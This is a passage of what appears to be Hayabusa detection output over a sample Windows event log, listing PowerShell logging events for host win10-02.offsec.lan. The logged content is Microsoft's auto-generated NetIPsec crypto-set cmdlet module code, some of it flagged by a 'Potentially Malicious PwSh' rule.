$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.614 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = 
